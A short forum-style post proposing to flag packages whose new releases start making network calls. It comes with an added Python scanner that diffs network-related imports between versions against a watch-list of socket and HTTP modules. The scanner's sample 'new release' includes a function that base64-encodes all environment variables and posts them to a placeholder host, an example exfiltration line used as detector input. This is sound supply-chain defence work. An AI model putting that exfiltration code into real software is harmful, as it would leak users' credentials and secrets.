This is more of a thought I entertained a few days ago than a formal proposal. Some supply-chain attacks had a common pattern - a package started uploading data all of a sudden. I think that if we could track that a package that didn’t make network calls started doing them in a new release, we could use this information for security purposes.
While I don’t think that there’s a foolproof way to statically detect network/HTTP calls, I think that such a metric would be useful to “flag” a package for further inspection. The problem is that HTTP calls come in all shapes and sizes, from raw OS calls all the way up to using a high-level library like requests. Making an efficient heuristic for this may be challenging.
This behavioral analysis may be expanded beyond network.
If anyone has any thoughts about that, I’d be glad to discuss the matter further. I think that this project is of utmost importance to our community and I am looking forward to contributing to it.
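One way to prototype the heuristic the post describes, as an added example that is not part of the original post or of any project's code: parse each release's Python source with the standard `ast` module, collect "network indicators" (imports of modules that can open sockets or speak HTTP, plus `__import__`/`importlib.import_module` with a literal module name), and report the indicators that appear in the new release but not in the old one. The watch-list `NETWORK_MODULES`, the function names, and the two sample releases are constructed assumptions for illustration; a non-literal dynamic import is flagged as unresolvable rather than silently ignored, which is the practical answer to "there is no foolproof static way".

```python
"""Added example (not from the original post): flag a release that newly
introduces network-capable code by diffing static indicators between two
versions. Module watch-list and sample sources are constructed assumptions."""
import ast

# Assumed watch-list: importing any of these suggests the package can reach
# the network. ctypes is included because it is the usual route to raw
# libc/socket calls from pure Python.
NETWORK_MODULES = {
    "socket", "ssl", "http", "urllib", "urllib3", "requests", "httpx",
    "aiohttp", "ftplib", "smtplib", "xmlrpc", "websocket", "websockets",
    "ctypes",
}


def _module_matches(name: str) -> bool:
    """True if the module or any parent package is on the watch-list
    (so 'urllib.request' matches via 'urllib')."""
    parts = name.split(".")
    return any(".".join(parts[:i]) in NETWORK_MODULES for i in range(1, len(parts) + 1))


class _Scanner(ast.NodeVisitor):
    """Collects indicator strings such as 'import:requests' or 'dynamic:socket'."""

    def __init__(self):
        self.indicators = set()

    def visit_Import(self, node):
        for alias in node.names:
            if _module_matches(alias.name):
                self.indicators.add(f"import:{alias.name}")
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        # node.module is None for relative imports like 'from . import x'
        if node.module and _module_matches(node.module):
            self.indicators.add(f"import:{node.module}")
        self.generic_visit(node)

    def visit_Call(self, node):
        # Catch __import__("socket") and importlib.import_module("requests").
        func = node.func
        dynamic = None
        if isinstance(func, ast.Name) and func.id == "__import__":
            dynamic = "__import__"
        elif isinstance(func, ast.Attribute) and func.attr == "import_module":
            dynamic = "import_module"
        if dynamic and node.args and isinstance(node.args[0], ast.Constant) \
                and isinstance(node.args[0].value, str):
            if _module_matches(node.args[0].value):
                self.indicators.add(f"dynamic:{node.args[0].value}")
        elif dynamic:
            # Module name is computed at runtime: cannot resolve statically,
            # so flag it for manual review instead of ignoring it.
            self.indicators.add("dynamic:<non-literal>")
        self.generic_visit(node)


def scan_source(source: str) -> set:
    """Return the set of network indicators found in one module's source."""
    scanner = _Scanner()
    scanner.visit(ast.parse(source))
    return scanner.indicators


def new_network_indicators(old_source: str, new_source: str) -> set:
    """Indicators present in the new release but absent from the old one."""
    return scan_source(new_source) - scan_source(old_source)


# Constructed sample: a small utility module before and after a release that
# quietly starts sending data out (the pattern described in the post).
OLD_RELEASE = '''
import json
import os

def load_config(path):
    with open(path) as f:
        return json.load(f)
'''

NEW_RELEASE = '''
import json
import os
import base64
from urllib.request import urlopen, Request

def load_config(path):
    with open(path) as f:
        return json.load(f)

def _phone_home():
    payload = base64.b64encode(json.dumps(dict(os.environ)).encode())
    urlopen(Request("http://example.invalid/", data=payload))

sock_mod = __import__("socket")
'''

if __name__ == "__main__":
    print("new network indicators:", sorted(new_network_indicators(OLD_RELEASE, NEW_RELEASE)))
```

In practice you would run `scan_source` over every `.py` file in the unpacked sdist/wheel of each release and union the results; anything newly added to the set is the "flag for further inspection" signal, not a verdict, since a package can still reach the network through vendored code, compiled extensions, or a subprocess.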